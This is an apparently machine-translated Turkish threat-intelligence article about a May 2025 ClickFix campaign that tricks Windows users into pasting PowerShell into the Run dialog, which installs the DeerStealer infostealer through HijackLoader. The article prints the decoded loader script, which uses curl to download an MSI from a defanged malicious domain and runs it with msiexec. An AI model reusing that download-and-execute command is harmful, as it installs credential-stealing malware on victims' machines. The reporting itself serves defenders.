Siber güvenlik araştırmacıları, kripto para cüzdanlarını, tarayıcı kimlik bilgilerini ve hassas kişisel verileri hasat etmek için tasarlanmış güçlü bir bilgi çalma olan DeerStealer’ı teslim etmek için Windows’un yerleşik çalışma istemini kullanan sofistike bir kötü amaçlı yazılım kampanyası ortaya çıkardılar.
Kötü niyetli operasyon, geleneksel güvenlik önlemlerini atlamak için meşru pencereler işlevselliğini gelişmiş kötü amaçlı yazılım dağıtım teknikleriyle birleştirerek sosyal mühendislik taktiklerinde ilgili bir evrimi temsil eder.
Mayıs 2025 boyunca aktif olan saldırı kampanyası, kurbanları Windows Run iletişim kutusu aracılığıyla gönüllü olarak kötü niyetli PowerShell komutlarını yürütmeye yönlendirmek için ClickFix olarak bilinen bir teknik kullanıyor.
.png
)
.webp)
Mağdurlar tipik olarak sahte hata mesajları veya sistem bildirimleri sunan ikna edici kimlik avı sayfalarına yönlendirilir ve bunları Windows+R’ye basmalarını ve imal edilen sorunu “çözmek” için görünüşte meşru bir komut yapıştırmasını ister.
Bu yaklaşım, kullanıcının kendi eylemlerinden ve güvenilir sistem süreçlerinden yararlanarak birçok güvenlik kontrolünü etkili bir şekilde atlatır.
Esentir güvenlik analistleri, tehdit aktörlerinin bu kötü amaçlı yazılımları tehdit müdahale birimleri (TRU) aracılığıyla dağıtma konusunda birden fazla girişim belirledi ve kampanyanın yaygın doğasını ve sofistike teknik uygulamasını ortaya koydu.
Araştırmacılar, Xfiles olarak da bilinen kötü amaçlı yazılımın, özellik setine ve hizmetlere bağlı olarak 200 $ ila 3000 $ arasında değişen abonelik tabanlı bir model aracılığıyla “Luciferxfiles” olarak tanımlanan bir kullanıcı tarafından karanlık web hack forumlarında satıldığını keşfettiler.
DeerStealer, 800’den fazla tarayıcı uzatma kimlik bilgilerini çıkarabilen, 14 farklı dijital para biriminde kripto para cüzdanlarını hedefleyen ve uyumsuzluk, telgraf, buhar ve çeşitli VPN istemcileri gibi popüler uygulamalardan veri toplayabilen kapsamlı bir veri hırsızlığı platformunu temsil eder.
Kötü amaçlı yazılımların kapsamlı yetenekleri, kripto para birimi adresi ikamesi için pano kaçırma, uzak masaüstü kontrolü için gizli VNC erişimi ve numuneler arasında sadece% 50 benzerlik ile yükler üreten gelişmiş gizleme teknikleri gibi gelişmiş özellikleri dahil ederek basit kimlik hırsızlığının ötesine uzanır.
Kötü amaçlı yazılım altyapısı, kalıcı iletişim kanallarını korurken gerçek komut ve kontrol sunucusu konumlarını gizlemek için “conta” adı verilen bir proxy etki alanı sistemi kullanır.
Bu yaklaşım, kötü amaçlı yazılımların donanım tanımlayıcıları ve sistem zaman damgaları kullanarak kurban makinelerini parmak izleme yeteneği ile birleştiğinde, tehdit aktörlerinin operasyonel güvenlik ve uzun vadeli kampanya sürdürülebilirliğine olan bağlılığını göstermektedir.
Gelişmiş enfeksiyon mekanizması ve yük dağıtım
Deerstealer enfeksiyon zinciri, kurbanların Windows Run istemine yapıştırdığı gizlenmiş bir PowerShell komutunun yürütülmesi ile başlar.
.webp)
Kod çözülmüş komut, tespit edilmesini önlemek için arazi içi ikili dosyalardan yararlanan sofistike bir çok aşamalı dağıtım sürecini ortaya çıkarır.
İlk PowerShell komut dosyası aşağıdaki bozulmuş içeriği içerir:-
$AqEVu = $env:AppData;
function kWERDs($EIpoJdP, $wQmPq){curl $EIpoJdP -o $wQmPq};
function zPWQQKzb($CAvStqT){kWERDs $CAvStqT $wQmPq}
$wQmPq = $env:AppData + '\now.msi';
zPWQQKzb "hxxps://luckyseaworld[.]com/now.msi";
msiexec.exe /i $wQmPq;;Bu komut dosyası, “Now.msi” adlı bir Microsoft yükleyici paketini, tehlikeye atılmış veya kötü amaçlı bir alandan indirmek için meşru curl.exe yardımcı programını kullanır, ardından Windows yükleyici hizmetini kullanarak yürütür.
MSI dosyası, 2023’te ortaya çıkan ve yapılandırma verilerini şifreli PNG görüntülerinde gizlemek için steganografi kullanan sofistike bir kötü amaçlı yazılım yükleyicisi olan HighackLoader için bir damlalık görevi görür.
Dağıtıldıktan sonra, HighackLoader birkaç dosyayı C: \ ProgramData dizinine kopyalar ve DLL kaçırma teknikleri ile manipüle edilen meşru, dijital olarak imzalanmış bir Comodo Internet Security Binary yürütür.
Meşru yürütülebilir, C çalışma zamanında, yürütme akışını kötü amaçlı yazılım akışını yeniden yönlendiren, güvenilir ikili etkin bir şekilde kötü amaçlı kod yürütme aracı olarak kullanan kancalar içeren kötü niyetli bir sürümünü yükler.
Herhangi biriyle tehdit tepkisini otomatikleştirin. -> Tam erişim isteyin